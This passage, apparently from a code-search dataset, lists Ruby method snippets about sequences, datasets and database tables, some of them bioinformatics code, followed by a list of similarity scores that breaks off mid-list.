"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
"def titulares_serial\n Representante.find(self.titular_ids_serial).map(&:nombre)\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def qseq; @mrna.seq; end",
"def generate_sequence(comparison)\n identifier = []\n identifier << {\n \"system\" => \"https://precision.fda.gov/fhir/Sequence/\",\n \"value\" => comparison.uid,\n }\n\n coding = []\n %w(ref_vcf ref_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n coding << {\n \"system\" => \"https://precision.fda.gov/files\",\n \"code\" => input.user_file.dxid,\n \"display\" => input.user_file.public? ? input.user_file.name : input.user_file.dxid,\n }\n end\n\n standard_sequence = { \"coding\" => coding }\n\n app = App.find_by(dxid: COMPARATOR_V1_APP_ID)\n coding = []\n\n if app\n coding << {\n \"system\" => \"https://precision.fda.gov/apps\",\n \"code\" => app.dxid,\n \"display\" => app.title,\n \"version\" => app.revision.to_s,\n }\n end\n\n method = {\n \"coding\" => coding,\n }\n\n quality_data = {\n \"type\" => \"unknown\",\n \"standardSequence\" => standard_sequence,\n \"method\" => method,\n \"truthTP\" => comparison.meta[\"true-pos\"].to_i,\n \"truthFN\" => comparison.meta[\"false-neg\"].to_i,\n \"queryFP\" => comparison.meta[\"false-pos\"].to_i,\n \"precision\" => comparison.meta[\"precision\"].to_f,\n \"recall\" => comparison.meta[\"recall\"].to_f,\n \"fMeasure\" => comparison.meta[\"f-measure\"].to_f,\n }\n\n # For ROC data points, convert them to floats before exporting\n meta_roc = comparison.meta[\"weighted_roc\"]\n\n headers_map = {\n \"score\" => \"score\",\n \"true_positives\" => \"numTP\",\n \"false_positives\" => \"numFP\",\n \"false_negatives\" => \"numFN\",\n \"precision\" => \"precision\",\n \"sensitivity\" => \"sensitivity\",\n \"f_measure\" => \"fMeasure\",\n }\n\n if meta_roc[\"data\"].present?\n headers = {}\n\n meta_roc[\"header\"].map.each_with_index do |h, i|\n new_key = headers_map[h]\n\n case h\n when \"score\", \"true_positives\", \"false_positives\", \"false_negatives\"\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_i }\n else\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_f }\n end\n end\n\n quality_data[\"roc\"] = headers\n end\n\n quality = []\n quality << quality_data\n repository = []\n\n %w(test_vcf test_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n repository << {\n \"type\" => \"login\",\n \"url\" => \"https://precision.fda.gov#{pathify(input.user_file)}\",\n \"name\" => \"PrecisionFDA\",\n \"variantsetId\" => input.user_file.dxid,\n }\n end\n\n {\n \"resourceType\" => \"Sequence\",\n \"type\" => \"dna\",\n \"coordinateSystem\" => 1,\n \"identifier\" => identifier,\n \"quality\" => quality,\n \"repository\" => repository,\n }\n end",
"def list_sequences(starts_with)\n self.select_rows(\"SHOW TABLES LIKE '#{starts_with}%_sequence'\").map { |result| result.first.gsub('_sequence', '') }\n end",
"def data(opts = {})\n sources = self.attributes[:sources] || []\n seq_opts = {:kind => self.attributes[:kind].to_sym}.merge(opts)\n sequence = SequenceQuery.new(sources, seq_opts)\n seqs = sequence.sequences\n seqs.map do |seq|\n {\n :data => seq[1],\n :start_time => sequence.start_time_epoch,\n :source => seq[0]\n }\n end\n end",
"def sequence\n return @sequence\n end",
"def sequence_separator; end",
"def sequences(name = nil)\n query(PostgreSQLExtensions::Utils.strip_heredoc(<<-SQL), name).map { |row| row[0] }\n SELECT c.relname AS sequencename\n FROM pg_class c\n WHERE c.relkind = 'S'::\"char\";\n SQL\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def make_tnt_input(seq_arr)\n seq_arr_length = seq_arr[0][:seq].length()\n retstr = \"xread\\n#{seq_arr_length} 49\\n\"\n seq_arr.each { |sa| retstr << \"#{sa[:genus]} #{sa[:seq]}\\n\" }\n retstr << \";\\n\"\nend",
"def generate_aasequences\n (0..self.sequence.length-1).each do |i|\n AAsequence.create(:seq_id=> self.seq_id,\n :amino_acid=>self.sequence[i],\n :original_position=>i)\n end\n end",
"def sample_data\n %w(A,B,1 A,C,2 B,C,3 B,D,3 C,D,1 B,E,2 D,F,3 D,E,3 E,G,3 F,G,1)\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def predict_format_converter usages\r\n @date = []\r\n @total = []\r\n @lines = []\r\n @labels = []\r\n @table_array = []\r\n usages[:daily_usage].each do |usage|\r\n @date.append(usage[:date].to_s)\r\n\r\n @total.append(usage[:usage])\r\n end\r\n @table_array.append(\"date[i]\")\r\n @table_array.append(\"total[i]\")\r\n usages[:daily_time_periods].each_with_index do |period, index|\r\n @name =\"lines[#{index.to_s}][i]\"\r\n @table_array.append(@name)\r\n @lines.append([])\r\n @labels.append(period[:label])\r\n period[:daily_usage].each do |usage|\r\n @lines[index].append(usage[:usage])\r\n\r\n end\r\n end\r\n end",
"def table \n table = data.map do |slot|\n slot.position.to_s.ljust(12) + slot.license_plate.ljust(19) + slot.color + \"\\n\" if slot\n end.join('')\n end",
"def serial_no\n [doc_series, doc_no].join(' ')\n end",
"def sequence=(value)\n @sequence = value\n end",
"def make_sequence\n 4.times do\n self.sequence << COLORS.sample\n end\n end",
"def uses_sequence?\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def qseq; @seq1.seq; end",
"def default_sequence_name(table, _column)\n \"#{table}_seq\"\n end",
"def getFtsProtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if ftH.has_key? \"pseudo\"\n next\n end\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n pep = ftH[\"translation\"][0] if !ftH[\"translation\"].nil?\n pepBioSeq = Bio::Sequence.auto(pep)\n seqout = pepBioSeq.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def hseq; @seq2.seq; end",
"def five_prime_utr_seq\n return self.seq[0, self.coding_region_cdna_start - 1]\n end",
"def getFtsNtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def sequence\n return self.dna.sequence\n end",
"def sequence(chr, start = nil, stop = nil)\n raise SequenceFileError, \"Do not now how to query for sequences from #{File.basename(@data_file)}!\"\n end",
"def serial_adj\n serial_word\n end",
"def seq\n @values.fetch('seq') { \n @values['seq'] = nil\n }\n end",
"def genetic_code_table; 11; end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def cds_seq\n cds_length = self.coding_region_cdna_end - self.coding_region_cdna_start + 1\n \n return self.seq[(self.coding_region_cdna_start - 1), cds_length]\n end",
"def seq\n Sequence::NA.new( fetch('').gsub(/ /,'').gsub(/\\d+/,'') )\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def create_column_data_array\n\ttable_id = create_table_id('../data/census_column_metadata.csv')\n\tcolumn_id = create_column_id('../data/census_column_metadata.csv')\n\t\n\t[title_processor,table_id,column_id].transpose\n\nend",
"def dataset\n database[table_name]\n end",
"def get_sequence\n raise NotImplementedError, \"This is an abstract class\"\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def build_model_sequences\n [Organization, Person, Deal, Project, LedgerTransaction, Invoice].each do |model_class|\n\n model_class_name = model_class.name\n if model_sequences.select { |ms| ms.model_class == model_class_name }.empty?\n\n sequence = ModelSequence.new\n sequence.model_class = model_class_name\n\n # Set the current value to 9999 for all but ledger transactions.\n sequence.current_value = 9999 unless model_class == LedgerTransaction\n\n model_sequences << sequence\n\n end\n\n end\n end",
"def add_sequences(repository, model)\n model.properties(repository.name).each do |property|\n create_sequence(repository, property) if property.serial?\n end\n end",
"def getIndexSequence(laneBarcode)\n if !laneIndexed?(laneBarcode)\n return \"\"\n else\n tag = laneBarcode.gsub(/^[1-8]-ID/, \"\")\n return @pipelineHelper.findBarcodeSequence(\"ID\" + tag.to_s) \n end\n end",
"def next_serial_number\n serial = permute(permute(@offset % BOUNDARY))\n @offset += STEP\n serial\n end",
"def getSequence\r\n\t\t\t\t\treturn @sequence\r\n\t\t\t\tend",
"def generate_data(item)\n acc = []\n extra_offset=0\n case item\n when MFComplexSequence\n inline_seq_header(HEADER_TYPES[:boxed], cell_width + 1, item.content.length, acc)\n item.content.each do |elt|\n if elt.is_a? MFIntLit\n type = HEADER_TYPES[:data]\n content = int_bytes(elt.value,cell_width)\n else\n type = HEADER_TYPES[:base_ref]\n content = int_bytes(generate_data(elt),2)+[0,0]\n end\n acc << type\n acc.concat content\n end\n when Quotation\n puts \"generating non-inline quotation: #{item} \" if Rake.verbose == true\n inline_seq_header(HEADER_TYPES[:quotation], 1, quotation_length(item.body), acc)\n item.body.each {|w| word_bytecode(w,acc)}\n acc << prim(:qend)\n extra_offset=1\n when MFStringLit then word_bytecode(item,acc)\n when MFLitSequence then word_bytecode(item,acc)\n else\n raise \"cannot generate data segment for #{item.class}\"\n end\n loc = @data_counter\n puts \"constant data at #{loc} \" if Rake.verbose == true\n @data.concat acc\n @data_counter += acc.length\n # referenced address should point to count byte, except for quotations, where it\n # points directly to the first instruction\n return loc + 2 + extra_offset\n end",
"def index\n @attrs['SeqNum']\n end",
"def seq\n return self.slice.seq\n end",
"def seq\n if @seq.nil?\n @seq = ''\n self.exons.each do |exon|\n @seq += exon.seq\n end\n end\n return @seq\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def initialize(primary_key, uuid, uti, note)\n # Set this objects's variables\n super(primary_key, uuid, uti, note)\n\n # This will hold our reconstructed table\n @reconstructed_table = Array.new\n\n # These variables hold different parts of the protobuf\n @row_items = Array.new\n @table_objects = Array.new\n @uuid_items = Array.new\n @type_items = Array.new\n\n @total_rows = 0\n @total_columns = 0\n\n # This will hold a mapping of UUID index number to row Array index in @reconstructed_table\n @row_indices = Hash.new\n\n # This will hold a mapping of UUID index number to column Array index in @reconstructed_table\n @column_indices = Hash.new\n\n # This will hold the table's direction, it defaults to left-to-right, will be changed during rebuild_table if needed\n @table_direction = LEFT_TO_RIGHT_DIRECTION\n rebuild_table\n end",
"def load_tsbs\n @seq_key = TSBS::Default_SkillSequence\n @seq_key = TSBS::Default_ItemSequence if is_a?(RPG::Item)\n @prepare_key = \"\"\n @return_key = \"\"\n @reflect_anim = animation_id\n first_time = true\n note.split(/[\\r\\n]+/).each do |line|\n case line \n when TSBS::SequenceREGX\n if first_time\n @seq_key = [$1.to_s]\n first_time = false\n else\n @seq_key.push($1.to_s)\n end\n when TSBS::PrepareREGX\n @prepare_key = $1.to_s\n when TSBS::ReturnREGX\n @return_key = $1.to_s\n when TSBS::ReflectAnim\n @reflect_anim = $1.to_i\n end\n end\n end",
"def load_tsbs\n @seq_key = TSBS::Default_SkillSequence\n @seq_key = TSBS::Default_ItemSequence if is_a?(RPG::Item)\n @prepare_key = \"\"\n @return_key = \"\"\n @reflect_anim = animation_id\n first_time = true\n note.split(/[\\r\\n]+/).each do |line|\n case line \n when TSBS::SequenceREGX\n if first_time\n @seq_key = [$1.to_s]\n first_time = false\n else\n @seq_key.push($1.to_s)\n end\n when TSBS::PrepareREGX\n @prepare_key = $1.to_s\n when TSBS::ReturnREGX\n @return_key = $1.to_s\n when TSBS::ReflectAnim\n @reflect_anim = $1.to_i\n end\n end\n end",
"def prepare_sequence(sequence)\n nv = remove_non_amino_acids(sequence)\n split_sequence(nv)\n end",
"def convert_serial_to_identity(table, opts=OPTS)\n raise Error, \"convert_serial_to_identity is only supported on PostgreSQL 10.2+\" unless server_version >= 100002\n\n server = opts[:server]\n server_hash = server ? {:server=>server} : OPTS\n ds = dataset\n ds = ds.server(server) if server\n\n raise Error, \"convert_serial_to_identity requires superuser permissions\" unless ds.get{current_setting('is_superuser')} == 'on'\n\n table_oid = regclass_oid(table)\n im = input_identifier_meth\n unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))\n raise Error, \"could not determine column to convert from serial to identity automatically\"\n end\n column = im.call(column)\n\n column_num = ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n get(:attnum)\n\n pg_class = Sequel.cast('pg_class', :regclass)\n res = ds.from(:pg_depend).\n where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').\n select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])\n\n case res.length\n when 0\n raise Error, \"unable to find related sequence when converting serial to identity\"\n when 1\n seq_oid, already_identity = res.first\n else\n raise Error, \"more than one linked sequence found when converting serial to identity\"\n end\n\n return if already_identity\n\n transaction(server_hash) do\n run(\"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT\", server_hash)\n\n ds.from(:pg_depend).\n where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').\n update(:deptype=>'i')\n\n ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n update(:attidentity=>'d')\n end\n\n remove_cached_schema(table)\n nil\n end",
"def sequencePrimaries(synsets)\n #\n #A synset's \"primaries\" are those words/phrases in the set; i.e., its collection of synonyms\n #Those synsets (via parameterization) whose synset_t2_map(s) indicates its primaries have\n #not yet been sequenced are done so here. \n #\n progress=0\n synsets.each do |synset|\n unless (synsetmaps=SynsetT2Map.find_all_by_synset_id(synset.synsetid))==[]\n synsetmaps.each do |synmap|\n######Console progress indicator################## \n progress=progress+1\n if progress%9==0\n print '.'\n if progress%100==0\n print \"+\\n\"\n end\n end\n##################################################\n unless ((synmap.th_sequence_id==nil) || \n (synmap.primaries_sequenced) || \n (synmap.th_phrase_definition_id==nil))\n #Add this phrase/definition pair as a ThMember of sequence.\n th_member = ThMember.create(:th_sequence_id => synmap.th_sequence_id,\n :th_phrase_definition_id => synmap.th_phrase_definition_id,\n :ordinality => PRIMARY_ORD,\n :th_mod_info_id => MyDModInfo.id)\n #Set the flag to indicate that the primary word/phrase for this phrase/definition pair\n #has been added as member to the sequence.\n synmap.update_attribute(:primaries_sequenced, TRUE)\n end\n end\n end\n end\n end",
"def _metadata_dataset\n super.\n with_identifier_input_method(identifier_input_method_default).\n with_identifier_output_method(identifier_output_method_default)\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = {}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def resourceType\n 'Sequence'\n end",
"def dataset\n @dataset ||= generate_dataset\n end",
"def query_def; @seq1.definition; end",
"def make_next_seq_no\n if EdiHelper.current_out_is_cumulative || @return_a_string\n @out_seq = 1\n else\n @out_seq = MesControlFile.next_seq_edi(MesControlFile.const_get(\"EDI_#{@flow_type.upcase}\"))\n @seq_increased = true\n end\n @formatted_seq = sprintf('%03d', @out_seq)\n end",
"def setSequence(sequence) \r\n\t\t\t\t\t@sequence = sequence\r\n\t\t\t\tend",
"def table_array\r\n @table_array\r\n end",
"def sequences(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def hseq; @genomic.seq; end",
"def sequence\n if !sequence?\n raise NotImplementedException, \"Attempted to get the sequence of a velvet node that is too short, such that the sequence info is not fully present in the node object\"\n end\n kmer_length = @parent_graph.hash_length\n\n # Sequence is the reverse complement of the ends_of_kmers_of_twin_node,\n # Then the ends_of_kmers_of_node after removing the first kmer_length - 1\n # nucleotides\n length_to_get_from_fwd = corresponding_contig_length - @ends_of_kmers_of_twin_node.length\n fwd_length = @ends_of_kmers_of_node.length\n raise \"Programming error\" if length_to_get_from_fwd > fwd_length\n revcom(@ends_of_kmers_of_twin_node)+\n @ends_of_kmers_of_node[-length_to_get_from_fwd...fwd_length]\n end",
"def start; @sequence[0]; end",
"def target\n unless defined?(@target)\n d = @data\n @target = SeqDesc.new(d[6], d[7], d[13], d[14], d[15], d[16],\n split_comma(d[20]), split_comma(d[22]))\n end\n @target\n end",
"def query_def; seq1.definition; end",
"def next_val_sequence(name)\n if self.class.to_s =~ /ActiveRecord::ConnectionAdapters::Mysql/\n self.insert_sql(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n else\n # the default insert_sql is nonsense, but jdbc_mysql doesn't override it\n self.execute(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n end\n end",
"def initialize\n @sequence = []\n end",
"def initialize(sequence:)\n @sequence = sequence\n end",
"def ids(tab, offset, n, ep, x)\n ret = (0..n - 1).to_a.product((\"A\"..\"E\").to_a).map{ |s|\n tab + \"-\" + s[1].to_s + \"-\" + s[0].to_s.rjust(2,\"0\")\n }\n if x\n ret += (0..n - 1).to_a.map{ |s| tab + \"-X-\" + s.to_s.rjust(2,\"0\") }\n end\n if !ep\n ret = ret.map{ |e| (0..4).to_a.map{ |l| e + \"-\" + l.to_s.rjust(2,\"0\") } }.flatten\n end\n ret = ret.each_with_index.map{ |l, i| [offset + i, l] }.to_h\nend",
"def sequence_params\n params.require(:sequence).permit(:title, :description, :data, :user_id, :location_id)\n end",
"def rows_enum\n data_maker.questions.\n map{|q|q.attribute_name}.\n uniq.select{|val| val.size > 0 && !self.cols.include?(val)}\n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def _dataset_method\n :\"_#{self[:name]}_dataset\"\n end",
"def calculate_deps\n SequenceDependency\n .where(ALL_SEQ_DEPS, device.id)\n .where(dependency_type: \"Point\")\n .where(dependency_id: points.pluck(:id))\n .map(&:sequence)\n end",
"def prepare_identities_from_data; end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def initialize_values\n #skip the first 5 bytes, don't know what they are for and they don't contain the data.\n @data.read(5)\n \n @attributes = columns.inject({}) do |hash, column|\n \n #get the unpack flag to get this data.\n value = @data.read(column.length).unpack(\"#{column.flag(column.type, column.length)}\").first\n hash[column.name] = value\n hash[column.name.underscore] = value\n \n hash\n end\n end",
"def three_prime_utr_seq\n return self.seq[self.coding_region_cdna_end..-1]\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def sequence_id\n object.sequence._id.to_s\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end",
"def getPep (cds, seq)\n\nend",
"def to_s(tab,table)\r\n\t\ts = \"\"\r\n\t\tif @instrucciones != nil\r\n\t\t\ts << @instrucciones.to_s(tab,table) + (\" \"*(tab))+\"Sequencing\\n\" + @instruccion.to_s(tab+1,table)\r\n\t\t\r\n\t\telse\r\n\t\t\ts << @instruccion.to_s(tab,table)\r\n\t\tend\r\n\r\n\t\treturn s\r\n\tend"
] |
[
"0.700258",
"0.56914324",
"0.5634827",
"0.55601764",
"0.55468976",
"0.53256935",
"0.5324605",
"0.52987653",
"0.52987653",
"0.52441895",
"0.52351105",
"0.5192623",
"0.5109223",
"0.5084473",
"0.50460196",
"0.503191",
"0.5023268",
"0.501827",
"0.49391106",
"0.49349368",
"0.4928668",
"0.49207178",
"0.49120754",
"0.49084523",
"0.48968145",
"0.487809",
"0.48708004",
"0.48585534",
"0.48448452",
"0.48291627",
"0.48267564",
"0.482545",
"0.48128808",
"0.48119414",
"0.4809747",
"0.4808586",
"0.48062107",
"0.4803351",
"0.47951317",
"0.4792993",
"0.47848207",
"0.47723404",
"0.47536528",
"0.47534683",
"0.4752293",
"0.47427973",
"0.47259828",
"0.47252488",
"0.47134617",
"0.47130415",
"0.47129148",
"0.47106066",
"0.47006574",
"0.4687794",
"0.46757862",
"0.4675554",
"0.4672518",
"0.46712458",
"0.46693122",
"0.46675152",
"0.4658706",
"0.46375066",
"0.46285123",
"0.46285123",
"0.4625008",
"0.46232235",
"0.4622557",
"0.46165118",
"0.46153665",
"0.46057162",
"0.46052867",
"0.45975167",
"0.45836958",
"0.45805565",
"0.45782197",
"0.4578198",
"0.45739073",
"0.45737848",
"0.45693862",
"0.4563443",
"0.45625955",
"0.4556211",
"0.45551485",
"0.4550036",
"0.4546474",
"0.4539692",
"0.4537845",
"0.45276913",
"0.45235446",
"0.4520538",
"0.45154604",
"0.451543",
"0.45137388",
"0.45048428",
"0.45036694",
